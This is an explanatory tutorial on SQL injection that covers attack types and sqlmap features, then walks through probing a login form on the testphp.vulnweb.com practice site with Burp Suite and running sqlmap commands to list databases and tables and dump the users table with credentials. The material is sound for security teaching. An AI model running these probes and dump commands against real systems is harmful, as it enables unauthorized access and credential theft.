SQL (Structured Query Language) Injection 

👉SQL Injection 

    SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details. 

    The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business. 

    When calculating the potential cost of an SQLi, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen. While this vector can be used to attack any SQL database, websites are the most frequent targets. 

👉SQL queries

        SQL is a standardized language used to access and manipulate databases to build customizable data views for each user. SQL queries are used to execute commands, such as data retrieval, updates, and record removal. Different SQL elements implement these tasks, e.g., queries using the SELECT statement to retrieve data, based on user-provided parameters. A typical eStore’s SQL database query may look like the following:

SELECT ItemName, ItemDescription

FROM Item

WHERE ItemNumber = ItemNumber

From this, the web application builds a string query that is sent to the database as a single SQL statement:

sql_query = “

SELECT ItemName, ItemDescription

FROM Item

Where ItemNumber = “& Request.QueryString(“ItemID”)

A user-provided input http://www.estore.com/items/items.asp?itemid=999 can then generates the following SQL query:

SELECT ItemName, ItemDescription

FROM Item

WHERE ItemNumber = 99

As you can gather from the syntax, this query provides the name and description for item number 999. 

👉Types of SQL Injections

    SQL injections typically fall under three categories: In-band SQLi (Classic), Inferential SQLi (Blind) and Out-of-band SQLi. You can classify SQL injections types based on the methods they use to access backend data and their damage potential.

 

i.  In-band SQLi: - The attacker uses the same channel of communication to launch their attacks and to gather their results. In-band SQLi’s simplicity and efficiency make it one of the most common types of SQLi attack. There are two sub-variations of this method:

 

੦ Error-based SQLi: - The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.

 

੦ Union-based SQLi: - This technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.

ii. Inferential (Blind) SQLi: - The attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure. This method is called blind SQLi because the data is not transferred from the website database to the attacker, thus the attacker cannot see information about the attack in-band. 

        Blind SQL injections rely on the response and behavioral patterns of the server so they are typically slower to execute but may be just as harmful. Blind SQL injections can be classified as follows: 

੦ Boolean: - That attacker sends a SQL query to the database prompting the application to return a result. The result will vary depending on whether the query is true or false. Based on the result, the information within the HTTP response will modify or stay unchanged. The attacker can then work out if the message generated a true or false result. 

੦ Time-based: - Attacker sends a SQL query to the database, which makes the database wait (for a period in seconds) before it can react. The attacker can see from the time the database takes to respond, whether a query is true or false. Based on the result, an HTTP response will be generated instantly or after a waiting period. The attacker can thus work out if the message they used returned true or false, without relying on data from the database. 

iii. Out-of-band SQLi: - The attacker can only carry out this form of attack when certain features are enabled on the database server used by the web application. This form of attack is primarily used as an alternative to the in-band and inferential SQLi techniques. 

        Out-of-band SQLi is performed when the attacker can’t use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed. These techniques count on the capacity of the server to create DNS or HTTP requests to transfer data to an attacker. 

👉SQL injection example

    There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include: 

a) Retrieving hidden data: where you can modify an SQL query to return additional results. 

b) Subverting application logic: where you can change a query to interfere with the application's logic. 

c) UNION attacks: where you can retrieve data from different database tables. 

d) Examining the database: where you can extract information about the version and structure of the database. 

e) Blind SQL injection: where the results of a query you control are not returned in the application's responses. 

👉SQL map

        sqlmap is an open-source penetration tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It includes a robust detection engine, numerous specialist features for the ultimate penetration tester, and a wide range of switches that span database fingerprinting, data retrieval from databases, access to the underlying file system, and executing commands on the operating system via out-of-band connections. 

    sqlmap is a python-based tool; therefore, it should operate on any system that supports Python. The purpose of sqlmap is to find and take benefit of SQL injection vulnerabilities in web applications. When it detects one or more SQL injections on the target host, the user can choose from a number of options, including performing an extensive back-end database management system fingerprint, retrieving DBMS session user and database, enumerating users, password hashes, privileges, databases, dumping entire or user-specific DBMS table/columns, running his own SQL statement, reading particular files on the file system and more.

        For help, write on terminal - sqlmap --help 

👉Features of SQL map

1. Full support for MYSQL, Oracle, PostgreSQL, Firebird, Sybase, Microsoft Access, IBM DB2, Microsoft SQL Server, SAP MaxDB database management systems. 

2. Full support for six SQL injection techniques: Boolean-based blind, error-based, stacked queries, UNION query, out-of-band. 

3. Automatic recognition of password hash formats and support for cracking them using a dictionary-based. 

4. Support for database process' user privilege escalation through Metasploit's Meterpreter get system. 

5. By giving DBMS credentials, IP address, port, and a database name, it is possible to connect to the database directly without using SQL injection. 

6. When using MYSQL, PostgreSQL, or Microsoft SQL Server, we can download and upload any file from the database server's underlying file system. 

7. Support for executing arbitrary commands and retrieving their standard output on the operating system's built-in database server when the database software is MYSQL, PostgreSQL or Microsoft SQL server. 

8. Support for establishing an out-of-band stateful TCP connection between the attacking machine and the database server underlying the operating system. Depending on the user's preference, this channel can be in interactive command prompt, a Meterpreter session, or a graphical user interface (VNC) session. 

9. Support for searching across all databases for specific database names, specific tables, or specified columns. This is helpful for identifying tables containing custom applications credentials when the relevant columns' names contain strings such as name. 

10. Support for dumping whole database tables, a range of entries, or select fields based on the user's preferences. The user can optionally select only a subset of characters from each column's entry to dump. 

11. Users, password hashes, roles, hashes, databases, tables and columns can be enumerated. 

👉Installing sqlmap 

SQLMAP – this tool pre- installed in kali linux, which is preferred choice of most attackers. Further, for install sqlmap - 

i. Go to kali linux and open terminal. 

ii. Write on terminal - sudo apt-get install sqlmap. 

👉Use of SQLMAP to test a website for SQL Injection Vulnerability 

We can test SQL injection vulnerability on that websites where the post request should be captured in burpsuite to find the vulnerability. 

    Here, we use login page of this website - http://testphp.vulnweb.com/login.php. 

This login page sends all requests through the post parameter. 

👉Follow the below steps -

i. At first, go to kali linux and open terminal. 

ii. A simple way to check whether your website is vulnerable so, enter any random value to username: admin' and password: admin' with single cote (') and turn on foxyproxy (127.0.0.1:8888). 

iii. Now, open Burpsuite on Kali Linux. Go to Proxy and on the Intercept for capture post request from this website- http://testphp.vulnweb.com/login.php. Now click on options and set the proxy (127.0.0.1:8888). We have to remember that browser proxy and burpsuite proxy should be same. 

iv. Now, go to browser and click on login and now the post request is captured in burpsuite. 

    After that, right click on this request and send this request to the Repeater. 

v. Now, click on Repeater and click on send. Then we will find this SQL error - Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/userinfo.php on line 10, that means this website is vulnerable to SQL injection vulnerability. 

vi. Now, copy this post request and save in a text file - sql.txt. Then we use this command to find the database- sqlmap -r sql.txt --batch --threads 10 --dbs and then we will find acuart database. 

vii. Then, we need to extract the tables from the acuart database. So, write on terminal - sqlmap -r sql.txt -D acuart --tables and press enter. 

    Where, -D = database name. 

                --tables = to show tables of acuart database. 

                -r = request file 

viii. Then, we found 8 tables from acuart database. 

ix. After that, we need to know username and password, so we use users table from acuart database and write on terminal – sqlmap -r sql.txt -D acuart -T users --columns --dump

        

        Where, -T = tables name. 

                     --columns = show users table’s information as columns. 

                     --dump = to download the information. 

x. Now we will find the users information as columns and also find the username and password. Table 'acuart.users' downloaded to CSV file. File location is ‘/root/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv’.